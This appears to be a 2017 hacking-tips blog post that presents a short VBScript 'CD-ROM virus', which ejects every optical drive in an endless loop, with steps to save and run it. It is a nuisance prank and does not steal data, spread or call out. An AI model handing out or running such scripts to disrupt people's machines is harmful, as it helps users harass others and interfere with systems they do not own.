Learn Hacking Online, We offer tons of computers and hacking tips and tricks.

Breaking News

Saturday, 4 February 2017

CD-ROM VIRUS

                        CD-ROM VIRUS
HELLO FRIENDS...                                                                        BY.MICKY VERMA                      

                        CD/DVD DRIVE VIRUS.

Open Notepad.
Copy the code given below exactely into the notepad file:
Set oWMP = CreateObject(“WMPlayer.OCX.7” )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then

do
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
loop
End If

Save it as “Anything.VBS”.


No comments:

Post a Comment

Pages